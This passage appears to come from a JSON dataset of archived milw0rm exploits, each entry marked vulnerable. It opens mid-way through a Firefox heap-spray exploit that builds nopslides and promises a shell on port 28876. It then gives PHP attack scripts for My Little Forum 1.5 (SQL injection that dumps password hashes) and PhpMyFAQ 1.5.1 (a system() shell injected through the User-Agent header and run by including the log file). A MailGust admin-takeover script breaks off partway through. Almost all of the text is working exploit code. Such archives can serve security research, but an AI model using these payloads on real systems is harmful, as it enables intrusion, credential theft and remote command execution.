+\n\n\t\t\"%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD\" +\n\n\t\t\"%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD\" +\n\n\t\t\"/\" +\n\n\t\t// Characters under 0x21 cannot be used, neither can 0x22. This\n\n\t\t// is what we overwrite the heap with, so everything needs to be a\n\n\t\t// pointer to one of our nopslides.\n\n\t\t\"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24\" +\n\n\t\t\"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24\" +\n\n\t\t\"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24\" +\n\n\t\t\"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24\" +\n\n\t\t\"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24\" +\n\n\t\t\"%21%21%25%21%23%21%24%25%25%23%25%24%23%23\"\n\n\t);\n\n    // Create one nopslide -------------------------------------------------\n\n    var sNopslide = \"\";\n\n    var iNopslideSize = iHeapBlockSize - iHeapHeaderSize \n\n   \t\t\t\t\t  - sShellcode.length * 2 - 2; // NULL terminator adds 2\n\n    var sAllWorkAndNoPlayMakesJackADullBoy = unescape(\n\n    \t// A list of addresses we hope our browser will use in a call or jmp.\n\n    \t// They should all point to a nopslide, preferably all to a different\n\n    \t// one _and_ be valid \"nop\" instructions too.\n\n\t\t\"%u1414%u1415%u141C%u141D%u1514%u1515%u151C%u151D\" +\n\n\t\t\"%u1C14%u1C15%u1C1C%u1C1D%u1D14%u1D15%u1D1C%u1D1D\"\n\n\t);\n\n    // (Make sure that ^^^ has a length that is a power of 2 (2, 4, 8 ,16, ...)\n\n    // The code below isn't sophisticated enough to handled other lengths.\n\n    for (var bit = Math.pow(2, 31); bit > 1; bit /= 2) {\n\n        sNopslide += sNopslide + (\n\n        \tiNopslideSize & (bit*sAllWorkAndNoPlayMakesJackADullBoy.length) ?\n\n        \tsAllWorkAndNoPlayMakesJackADullBoy : \"\"\n\n        );\n\n    }\n\n    // We've only made complete copies of the string, we may need a part of it\n\n    // to make it exactly the size we want it to be:\n\n    sNopslide = sNopslide + sAllWorkAndNoPlayMakesJackADullBoy.substr(0,\n\n    \tiNopslideSize/2 - sNopslide.length\n\n    );\n\n    // How many blocks do we need to fill memory up to iHeap_fill_to_address?\n\n    var iHeapBlockCount = Math.ceil(\n\n    \t(iFillToAddress - iHeapStartAddress) / iHeapBlockSize\n\n    );\n\n\n\n    // Show copyright message and some stats ----------------------------------\n\n    document.write(\n\n    \t\"<H2>Pwnzilla</H2>\" +\n\n    \t\"<B>Copyright (C) 2003-2005 Berend-Jan \\\"SkyLined\\\" Wever.</B><BR>\" +\n\n\t\t\"This program is released under the GNU Public License version 2, \" +\n\n\t\t\"1991 and comes with ABSOLUTELY NO WARRANTY. View source for \" +\n\n\t\t\"details.<HR>\" +\n\n    \t\"<H2>Multi threaded heap spray 2005</H2>\" +\n\n\t\t\"Assumed heap header size: \" + number(iHeapHeaderSize) + \" bytes.<BR>\"+\n\n    \t\"Nopslide size: \" + number(sNopslide.length*2) + \" bytes.<BR>\" +\n\n\t\t\"Shellcode size: \" + number(sShellcode.length*2) + \" bytes.<BR>\" +\n\n    \t\"Heap blocks size: \" + number(iHeapBlockSize) + \" bytes.<BR>\" +\n\n\t\t\"<SPAN id=\\\"heapBlockStatus\\\">\" +\n\n        \t\"Allocating \" +  number(iHeapBlockCount) + \" heap blocks...<BR>\" +\n\n\t\t\t\"<DIV style=\\\"border:1px solid black; background:#808080; \" +\n\n\t\t\t\"width:500px;\\\"><DIV style=\\\"text-align:right; \" +\n\n\t\t\t\"border-right:1px solid black; background:#00FF00;\\\" \" +\n\n\t\t\t\"id=\\\"progressBar\\\">0</DIV></DIV>\" +\n\n\t\t\"</SPAN>\" +\n\n\t\t\"<SPAN id=\\\"exploitStatus\\\"></SPAN>\"\n\n\t);\n\n    var heapBlockStatusElement = document.getElementById(\"heapBlockStatus\");\n\n\tvar progressBarElement = document.getElementById(\"progressBar\");\n\n\tvar exploitStatusElement = document.getElementById(\"exploitStatus\");\n\n\n\n    var asHeapBlocks = new Array();\n\n\n\n\t// The next part uses timeouts to run in the background.\n\n    createHeapBlock();\n\n    function createHeapBlock() {\n\n    \tif (asHeapBlocks.length < iHeapBlockCount) {\n\n\t\t    // Create a heap block --------------------------------------------\n\n\t        asHeapBlocks.push(sNopslide + '' + sShellcode);\n\n\t        var percentageDone = Math.round(\n\n\t        \t100*asHeapBlocks.length/iHeapBlockCount\n\n\t        );\n\n\t\t\tprogressBarElement.innerHTML = \n\n\t\t\t\t\"<NOBR>\" +\n\n\t\t\t\t\tbytes(asHeapBlocks.length*asHeapBlocks[0].length*2) +\n\n\t\t\t\t\"</NOBR>\";\n\n\t\t\tprogressBarElement.style.width = percentageDone + \"%\";\n\n\t\t\tsetTimeout(arguments.callee, 10);\n\n\t\t} else {\n\n\t\t    // Done creating heap blocks --------------------------------------\n\n\t\t    // Show stats\n\n\t        heapBlockStatusElement.innerHTML = \n\n\t\t    \t\"Heap blocks count: \" + asHeapBlocks.length + \".<BR>\" +\n\n\t\t    \t\"Total heap consumption: \" + \n\n\t\t    \t\tbytes(asHeapBlocks.length*asHeapBlocks[0].length*2) +\n\n\t\t    \t\t\".<BR>\" +\n\n\t\t\t\t\"Elapsed time: \" + \n\n\t\t\t\t\ttime(new Date() - startDate) + \".<HR>\" +\n\n\t\t    \t\"<H2>Exploit</H2>\" +\n\n\t\t    \t\"Attack URL (size: \" +\n\n\t\t    \t\tnumber(sURL.length*2) + \" bytes):<BR>\" +\n\n\t\t    \t\"\"\" + escape(sURL) + \"\"<BR><BR>\";\n\n\t\t    //  Ask if you want to get pwned\n\n\t\t    exploitStatusElement.innerHTML =\n\n\t\t\t\t\"<BUTTON onclick=\\\"FiredFox();\\\">\" +\n\n\t\t\t\t\t\"Click here if you want to run the actual exploit\" +\n\n\t\t\t\t\"</BUTTON>\";\n\n\t\t}\n\n\t} // createHeapBlock()\n\n\tfunction FiredFox() {\n\n\t\texploitStatusElement.innerHTML =\n\n\t\t\t\"Running exploit code...<BR>\" +\n\n\t\t\t\"(It may take some time before the exploit works. You should \" +\n\n\t\t\t\"see a progress bar below. If it stops, it either worked and a \" +\n\n\t\t\t\"shell is waiting for you at port 28876 or your browser has \" +\n\n\t\t\t\"gone into an infinite loop).<BR>\";\n\n\t\tsetInterval(function() {\n\n\t\t\tvar oElement = new Image();\n\n\t\t\toElement.src = sURL+\"\"; // This is where we abuse the flaw.\n\n\t\t\toElement.border = 1;\n\n\t\t\toElement.width = 1;\n\n\t\t\toElement.height = 10;\n\n\t\t\tdocument.body.appendChild(oElement);\n\n\t\t}, 1);\t\t\n\n\t} // FiredFox()\n\n\n\n\tfunction number(iValue) {\n\n\t\t// Returns a \"pretty\" string representation of a number:\n\n\t\t//\t\tnumber(1000000.5) == \"1,000,000.5\"\n\n\t\tvar sResult = \"\" + iValue;\n\n\t\t\n\n\t\tfor (var sResult = \"\"; iValue > 0; iValue = Math.floor(iValue/1000)) {\n\n\t\t\tsResult = (iValue % 1000) +\n\n\t\t\t\t(sResult.length > 0 ? \",\" + sResult : \"\");\n\n\t\t\tif (iValue > 1000 && sResult.length % 4 < 3)\n\n\t\t\t\tsResult = \"0\" + sResult;\n\n\t\t}\n\n\t\treturn sResult;\n\n\t} // number()\n\n\n\n\tfunction bytes(iValue) {\n\n\t\t// Returns a \"pretty\" string representation of a number of bytes:\n\n\t\t//\t\tbytes(1000000.5) == \"976.57 KB\"\n\n\t\tvar aUnits = new Array(\n\n    \t\t\"Bytes\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\"\n\n\t    );\n\n\t    for (var i = 0; iValue > 1024; i++, iValue /= 1024) {}\n\n\t    sResult =  number(Math.ceil(iValue * 100) / 100) + // Two decimals\n\n\t    \t\" \" + aUnits[i]\n\n\t\treturn sResult;\n\n\t}// bytes()\n\n\tfunction time(iValue) {\n\n\t\t// Returns a \"pretty\" string representation of an elapsed number of\n\n\t\t// milliseconds:\t\n\n\t\t//\t\ttime(1000000.5) == \"16m 40s 1\u00b5s\"\n\n\t\tvar aUnits = new Array(\n\n\t\t\tnew Array(1000,\tunescape(\"%u03BCs\")),\n\n\t\t\tnew Array(60,\t\"s\"),\n\n\t\t\tnew Array(60,\t\"m\"),\n\n\t\t\tnew Array(24,\t\"h\"),\n\n\t\t\tnew Array(7,\t\"d\"),\n\n\t\t\tnew Array(52,\t\"y\")\n\n\t\t);\n\n\t\tsResult = \"\";\n\n\t\t\n\n\t\tfor(var i=0; iValue > 0 && i<aUnits.length; i++) {\n\n\t\t\tvar iSize = aUnits[i][0], sUnit = aUnits[i][1];\n\n\t\t\tsResult = Math.round(iValue % iSize) + sUnit +\n\n\t\t\t\t(i>0 ? \" \" : \"\") + sResult;\n\n    \t\tiValue = Math.floor(iValue / iSize);\n\n    \t}\n\n    \treturn sResult;\n\n\t} // time()\n\n</SCRIPT></HTML>\n\n\n\n# milw0rm.com [2005-09-22]",
1165        "vulnerable": true
1166    },
1167    {
1168        "exploit_id": 1225,
1169        "content": "<?php\n\n#   mlfexpl.php                                                                #\n\n#                                                                              #\n\n#   My Little Forum 1.5 ( possibly prior versions) SQL Injection /             #\n\n#   MD5 password hash disclosure poc exploit with proxy support                #\n\n#                                                                              #\n\n#                                by rgod                                       #\n\n#                      site: http://rgod.altervista.org                        #\n\n#                                                                              #\n\n#   make these changes in php.ini if you have troubles                         #\n\n#   to launch this script:                                                     #\n\n#   allow_call_time_pass_reference = on                                        #\n\n#   register_globals = on                                                      #\n\n#                                                                              #\n\n#   usage: launch this script from Apache, fill requested fields, then...      #\n\n#   dump all password hashes from database right now...                        #\n\n#                                                                              #\n\n#   Sun-Tzu: \"You can be sure of succeeding in your attacks if you only attack #\n\n#   places which are undefended. You can ensure the safety of your defense if  #\n\n#   you only hold positions that cannot be attacked.\"                          #\n\n\n\nerror_reporting(0);\n\nini_set(\"max_execution_time\",0);\n\nini_set(\"default_socket_timeout\", 2);\n\nob_implicit_flush (1);\n\n\n\necho'<head><title>My Little Forum 1.5 SQL Injection </title><meta http-equiv=\"Co\n\nntent-Type\"  content=\"text/html; charset=iso-8859-1\"><style type=\"text/css\"><!--\n\nbody,td,th {   color:  #00FF00;} body {  background-color: #000000;} .Stile5   {\n\nfont-family: Verdana, Arial, Helvetica,  sans-serif; font-size: 10px;}  .Stile6{\n\nfont-family: Verdana, Arial, Helvetica, sans-serif; font-weight:  bold; font-sty\n\nle: italic; } --> </style></head> <body> <p class=\"Stile6\">  My   Little Forum 1\n\n.5 SQL Injection </p><p class=\"Stile6\">a script by rgod at <a href=\"http: //rgod\n\n.altervista.org\"    target=\"_blank\" > http://rgod.altervista.org </a> </p><table\n\nwidth=\"84%\"><tr><td width=\"43%\">  <form  name=\"form1\"  method=\"post\"   action=\"'\n\n.$SERVER[PHP_SELF].'?path=value&host=value&port=value&proxy=value&username=value\n\n\"><p><input type=\"text\" name=\"host\"><span class=\"Stile5\">hostname (ex: www.siten\n\name.com) </span></p><p><input type=\"text\"    name=\"path\">  <span class=\"Stile5\">\n\npath (ex: /mylf/ or just /) </span></p><p><input type=\"text\"  name=\"port\" ><span\n\nclass=\"Stile5\"> specify a port other than 80 (default value)</span></p><p><input\n\ntype=\"text\" name=\"proxy\"> <span class=\"Stile5\"> send  exploit  through  an  HTTP\n\nproxy (ip:port) </span> </p> <p> <input type=\"text\" name=\"username\"> <span class\n\n=\"Stile5\">username whom you want MD5 hash </span> </p> <p> <input  type=\"submit\"\n\nname=\"Submit\" value=\"go!\"></p></form></td></tr></table></body>';\n\n\n\nfunction show($headeri)\n\n{\n\n$ii=0;\n\n$ji=0;\n\n$ki=0;\n\n$ci=0;\n\necho '<table border=\"0\"><tr>';\n\nwhile ($ii <= strlen($headeri)-1)\n\n{\n\n$datai=dechex(ord($headeri[$ii]));\n\nif ($ji==16) {\n\n             $ji=0;\n\n             $ci++;\n\n             echo \"<td>&nbsp;&nbsp;</td>\";\n\n             for ($li=0; $li<=15; $li++)\n\n                      { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\n\t\t\t    }\n\n            $ki=$ki+16;\n\n            echo \"</tr><tr>\";\n\n            }\n\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n\n{echo \"<td>\".$datai.\"</td> \";}\n\n$ii++;\n\n$ji++;\n\n}\n\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n\n                      { echo \"<td>&nbsp&nbsp</td>\";\n\n                       }\n\n\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n\n                      { echo \"<td>\".$headeri[$li].\"</td>\";\n\n\t\t\t    }\n\necho \"</tr></table>\";\n\n}\n\n\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\n\n\nfunction sendpacket($packet,$show)\n\n{\n\nglobal $proxy, $host, $port, $html;\n\nif ($proxy=='')\n\n           {$ock=fsockopen(gethostbyname($host),$port);}\n\n             else\n\n           {\n\n\t    if (!eregi($proxy_regex,$proxy))\n\n\t    {echo htmlentities($proxy).' -> not a valid proxy...';\n\n\t     die;\n\n\t    }\n\n\t   $parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $ock=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$ock) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t   }\n\nfputs($ock,$packet);\n\nif ($proxy=='')\n\n  {\n\n\n\n    $html='';\n\n    while (!feof($ock))\n\n      {\n\n        $html.=fgets($ock);\n\n      }\n\n  }\n\nelse\n\n  {\n\n    $html='';\n\n    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\n\n    {\n\n      $html.=fread($ock,1);\n\n    }\n\n  }\n\nfclose($ock);\n\nif ($show) {echo nl2br(htmlentities($html));}\n\n}\n\n\n\nif (($path<>'') and ($host<>'') and ($username<>''))\n\n{\n\n  if ($port=='') {$port=80;}\n\n\n\n\n\n$sql=\"%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw\";\n\n$sql=\", user_pw\"; //if version is 1.6 beta, just add a comment to ths line\n\n$sql=\" FROM forum_userdata WHERE user_name='\".$username.\"'/*\";\n\n$sql=urlencode($sql);\n\n\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.\"search.php?search=\".$sql.\"&ao=phrase HTTP/1.1\\r\\n\";}\n\nelse\n\n{$packet=\"GET http://\".$host.$path.\"search.php?search=\".$sql.\"&ao=phrase HTTP/1.1\\r\\n\";}\n\n$packet.=\"Client-IP: 127.0.0.1\\r\\n\";\n\n$packet.=\"X-Forwarded-For: 127.0.0.1\\r\\n\";\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"search.php\\r\\n\";\n\n$packet.=\"Accept-Language: en\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n$packet.=\"User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive\\r\\n\\r\\n\";\n\nshow($packet);\n\nsendpacket($packet,0);\n\n$temp=explode(';<span class=\"category\">(',$html);\n\n$temp2=explode(')</span>',$temp[1]);\n\n$hash=$temp2[0];\n\n\n\necho '<br>username: '.$username.' hash: '.$hash;\n\n# debugging...\n\n//echo htmlentities($html);\n\n}\n\nelse\n\n{\n\necho '<br>fill in all requested fields, optionally specify a proxy...<br>';\n\n}\n\n?>\n\n\n\n# milw0rm.com [2005-09-22]",
1170        "vulnerable": true
1171    },
1172    {
1173        "exploit_id": 1226,
1174        "content": "<?php\n\n#   17.34 22/09/2005                                                           #\n\n#                                                                              #\n\n#   phpmyfaq_xpl.php                                                           #\n\n#                                                                              #\n\n#   PhpMyFaq 1.5.1 ( possibly prior versions) shell inject                     #\n\n#                                                                              #\n\n#                                by rgod                                       #\n\n#                      site: http://rgod.altervista.org                        #\n\n#                                                                              #\n\n#   make these changes in your php.ini if you have troubles                    #\n\n#   to launch this script:                                                     #\n\n#   allow_call_time_pass_reference = on                                        #\n\n#   register_globals = on                                                      #\n\n#                                                                              #\n\n#   usage: launch this script from Apache, fill requested fields, then         #\n\n#   if magic_quotes_gpc is off, boom! you launch commands...                   #\n\n#                                                                              #\n\n#   Sun-tzu: \"When in difficult country, do not encamp. In country where high  #\n\n#   roads intersect, join hands with your allies. Do not linger in dangerously #\n\n#   isolated positions. In hemmed-in situations, you must resort to stratagem. #\n\n#   In desperate position, you must fight.\"                                    #\n\n\n\nerror_reporting(0);\n\nini_set(\"max_execution_time\",0);\n\nini_set(\"default_socket_timeout\", 2);\n\nob_implicit_flush (1);\n\n\n\necho'<head> <title> PhpMyFAQ 1.5.1  remote  commands  execution  </title> <meta\n\nhttp-equiv=\"Content-Type\"  content=\"text/html; charset=iso-8859-1\"> <style type=\n\n\"text/css\"> <!-- body,td,th {color:  #00FF00;} body {background-color: #000000;}\n\n.Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif; font-size: 10px; }\n\n.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:  bold;\n\nfont-style: italic; } --> </style></head> <body> <p class=\"Stile6\">     PhpMyFAQ\n\nV  1.5.1 (possibly prior versions) remote commands execution  </p><p class=\"Stil\n\ne6\">a script by rgod at <a href=\"http://rgod.altervista.org\"    target=\"_blank\">\n\nhttp://rgod.altervista.org</a></p><table width=\"84%\"><tr><td width=\"43%\"> <form\n\nname=\"form1\"      method=\"post\"   action=\"'.$SERVER[PHP_SELF].'?path=value&host=\n\nvalue&port=value&command=value&proxy=value\"><p><input type=\"text\"   name=\"host\">\n\n<span class=\"Stile5\">  hostname  (ex: www.sitename.com)  </span>  </p> <p><input\n\ntype=\"text\" name=\"path\"><span class=\"Stile5\">  path ( ex:  /phpmyfaq/ or just /)\n\n</span></p><p><input type=\"text\"   name=\"port\" >   <span class=\"Stile5\"> specify\n\na port other than 80 (default value)  </span></p><p> <input  type=\"text\"   name=\n\n\"command\"> <span  class=\"Stile5\"> a  Unix  command  ,  example:  ls -la  to list\n\ndirectories, cat /etc/passwd to show passwd file </span></p><p><input type=\"text\n\n\" name=\"proxy\"> <span class=\"Stile5\"> send exploit through an HTTP proxy (ip:por\n\nt</span></p> <p> <input  type=\"submit\"name=\"Submit\" value=\"go!\"></p></form></td>\n\n</tr></table></body></html>';\n\n\n\nfunction show($headeri)\n\n{\n\n$ii=0;\n\n$ji=0;\n\n$ki=0;\n\n$ci=0;\n\necho '<table border=\"0\"><tr>';\n\nwhile ($ii <= strlen($headeri)-1)\n\n{\n\n$datai=dechex(ord($headeri[$ii]));\n\nif ($ji==16) {\n\n             $ji=0;\n\n             $ci++;\n\n             echo \"<td>&nbsp;&nbsp;</td>\";\n\n             for ($li=0; $li<=15; $li++)\n\n                      { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\n\t\t\t    }\n\n            $ki=$ki+16;\n\n            echo \"</tr><tr>\";\n\n            }\n\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n\n{echo \"<td>\".$datai.\"</td> \";}\n\n$ii++;\n\n$ji++;\n\n}\n\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n\n                      { echo \"<td>&nbsp&nbsp</td>\";\n\n                       }\n\n\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n\n                      { echo \"<td>\".$headeri[$li].\"</td>\";\n\n\t\t\t    }\n\necho \"</tr></table>\";\n\n}\n\n\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\n\n\nfunction sendpacket($packet)\n\n{\n\nglobal $proxy, $host, $port, $html;\n\nif ($proxy=='')\n\n           {$ock=fsockopen(gethostbyname($host),$port);}\n\n             else\n\n           {\n\n\t    if (!eregi($proxy_regex,$proxy))\n\n\t    {echo htmlentities($proxy).' -> not a valid proxy...';\n\n\t     die;\n\n\t    }\n\n\t   $parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $ock=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$ock) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t   }\n\nfputs($ock,$packet);\n\nif ($proxy=='')\n\n  {\n\n\n\n    $html='';\n\n    while (!feof($ock))\n\n      {\n\n        $html.=fgets($ock);\n\n      }\n\n  }\n\nelse\n\n  {\n\n    $html='';\n\n    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\n\n    {\n\n      $html.=fread($ock,1);\n\n    }\n\n  }\n\nfclose($ock);\n\necho nl2br(htmlentities($html));\n\n}\n\n\n\nif (($path<>'') and ($host<>'') and ($command<>''))\n\n{\n\n  if ($port=='') {$port=80;}\n\n\n\n# STEP 1 -> Shell Inject...\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.\"index.php?sid=49493&lang=it&action=ask HTTP/1.0 \\r\\n\";}\n\nelse\n\n{$packet=\"GET http://\".$host.$path.\"index.php?sid=49493&lang=it&action=ask HTTP/1.0 \\r\\n\";}\n\n\n\n$packet.='User-Agent: <?php system($HTTP_GET_VARS[cmd]) ?><?php die ?>'.\"\\r\\n\";\n\n//you cannot insert \";\" because it is stripped, so insert more statements\n\n//if you change the shell, keep attemption to php syntax, if you make an error,\n\n//you cannot lauch commands till tomorrow, I am not joking ;)\n\n\n\n$packet.=\"Accept-Language: pl\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"\\r\\n\";\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip,deflate\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\";\n\n$packet.=\"Cookie: lang=it; sid=49493\\r\\n\";\n\nshow($packet);\n\nsendpacket($packet);\n\n\n\n# STEP 2 -> Include the log file and launch commands...\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.\"index.php?cmd=\".urlencode($command).\"&LANGCODE=/../../data/tracking\".date(\"dmY\").\"%00 HTTP/1.0 \\r\\n\";}\n\nelse\n\n{$packet=\"GET http://\".$host.$path.\"index.php?cmd=\".urlencode($command).\"&LANGCODE=/../../data/tracking\".date(\"dmY\").\"%00 HTTP/1.0 \\r\\n\";}\n\n$packet.='User-Agent: Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.2 (like Gecko)'.\"\\r\\n\";\n\n$packet.=\"Accept-Language: fr\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"\\r\\n\";\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip,deflate\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\";\n\n$packet.=\"Cookie: lang=it; sid=49493\\r\\n\";\n\nshow($packet);\n\nsendpacket($packet);\n\n}\n\nelse\n\n{\n\necho '<br>fill in requested fields, optionally specify a proxy...<br><br>';\n\n}\n\n?>\n\n\n\n# milw0rm.com [2005-09-23]",
1175        "vulnerable": true
1176    },
1177    {
1178        "exploit_id": 1227,
1179        "content": "<?php\n\n\n\n#   mailgust_xpl.php                                                           #\n\n#                                                                              #\n\n#   MailGust 1.9  ( possibly prior versions) SQL Injection / board takeover    #\n\n#   poc exploit with generic HTTP proxy support                                #\n\n#                                by rgod                                       #\n\n#                      site: http://rgod.altervista.org                        #\n\n#                                                                              #\n\n#                                                                              #\n\n#   make these changes in php.ini if you have troubles                         #\n\n#   to launch this script:                                                     #\n\n#   allow_call_time_pass_reference = on                                        #\n\n#   register_globals = on                                                      #\n\n#                                                                              #\n\n#   usage: launch this script from Apache, fill requested fields, then         #\n\n#   send yourself a new admin password right now!                              #\n\n#                                                                              #\n\n#   Sun-Tzu: \"Hence to fight and conquer in all your battles is not supreme    #\n\n#   excellence;  a supreme excellence consists in breaking the enemy's         #\n\n#   resistance without  fighting.\"                                             #\n\n\n\nerror_reporting(0);\n\nini_set(\"max_execution_time\",0);\n\nini_set(\"default_socket_timeout\", 2);\n\nob_implicit_flush (1);\n\n\n\necho'<head><title>M a i l G u s t  v.1.9  S Q L   I n j e c t i o n</title><meta\n\nhttp-equiv=\"Content-Type\"  content=\"text/html; charset=iso-8859-1\"> <style type=\n\n\"text/css\"> <!-- body,td,th {color:  #00FF00;} body {background-color: #000000;}\n\n.Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif; font-size: 10px; }\n\n.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:  bold;\n\nfont-style: italic; } --> </style></head> <body> <p class=\"Stile6\">     MailGust\n\nV 1.9 (possibly prior versions) SQL Injection / board takeover</p><p class=\"Stil\n\ne6\">a script by rgod at <a href=\"http://rgod.altervista.org\"    target=\"_blank\">\n\nhttp://rgod.altervista.org</a></p><table width=\"84%\"><tr><td width=\"43%\"> <form\n\nname=\"form1\"      method=\"post\"   action=\"'.$SERVER[PHP_SELF].'?path=value&host=\n\nvalue&port=value&proxy=value&your_email=value\"><p><input type=\"text\" name=\"host\"\n\n><span class=\"Stile5\"> hostname  (ex: www.sitename.com)  </span> </p> <p> <input\n\ntype=\"text\" name=\"path\"><span class=\"Stile5\"> path ( ex: /mailgust/  or just / )\n\n</span></p><p><input type=\"text\"   name=\"port\" >  <span class=\"Stile5\">  specify\n\na  port  other  than  80  ( default value ) </span> </p> <p>  <input type=\"text\"\n\nname=\"your_email\"> <span  class=\"Stile5\"> e-mail where MG will send the password\n\n</span></p><p><input type=\"text\" name=\"proxy\"> <span class=\"Stile5\">send exploit\n\nthrough an HTTP proxy (ip:port)</span></p> <p><input type=\"submit \"name=\"Submit\"\n\nvalue=\"go!\"></p></form></td></tr></table></body></html>';\n\n\n\nfunction show($headeri)\n\n{\n\n$ii=0;\n\n$ji=0;\n\n$ki=0;\n\n$ci=0;\n\necho '<table border=\"0\"><tr>';\n\nwhile ($ii <= strlen($headeri)-1)\n\n{\n\n$datai=dechex(ord($headeri[$ii]));\n\nif ($ji==16) {\n\n             $ji=0;\n\n             $ci++;\n\n             echo \"<td>&nbsp;&nbsp;</td>\";\n\n             for ($li=0; $li<=15; $li++)\n\n                      { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\n\t\t\t    }\n\n            $ki=$ki+16;\n\n            echo \"</tr><tr>\";\n\n            }\n\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n\n{echo \"<td>\".$datai.\"</td> \";}\n\n$ii++;\n\n$ji++;\n\n}\n\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n\n                      { echo \"<td>&nbsp&nbsp</td>\";\n\n                       }\n\n\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n\n                      { echo \"<td>\".$headeri[$li].\"</td>\";\n\n\t\t\t    }\n\necho \"</tr></table>\";\n\n}\n\n\n\n\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\n\n\n\n\nfunction sendpacket($packet)\n\n{\n\nglobal $proxy, $host, $port, $html;\n\nif ($proxy=='')\n\n           {$ock=fsockopen(gethostbyname($host),$port);}\n\n             else\n\n           {\n\n\t    if (!eregi($proxy_regex,$proxy))\n\n\t    {echo htmlentities($proxy).' -> not a valid proxy...';\n\n\t     die;\n\n\t    }\n\n\t   $parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $ock=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$ock) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t   }\n\nfputs($ock,$packet);\n\nif ($proxy=='')\n\n  {\n\n\n\n    $html='';\n\n    while (!feof($ock))\n\n      {\n\n        $html.=fgets($ock);\n\n      }\n\n  }\n\nelse\n\n  {\n\n    $html='';\n\n    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\n\n    {\n\n      $html.=fread($ock,1);\n\n    }\n\n  }\n\nfclose($ock);\n\necho htmlentities($html);\n\n}\n\n\n\nfunction isemail($email)\n\n   {\n\n       $regex = '^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]{2,})+$';\n\n       if (eregi($regex, $email)) return true;\n\n       else return false;\n\n   }\n\n\n\nif (($path<>'') and ($host<>'') and ($your_email<>''))\n\n{\n\n  if ($port=='') {$port=80;}\n\n\n\n$your_email=trim($your_email);\n\nif (!isemail($your_email))\n\n{\n\n echo '<br> I am not MailGust! You have to give me a valid e-mail...<br><br>';\n\n 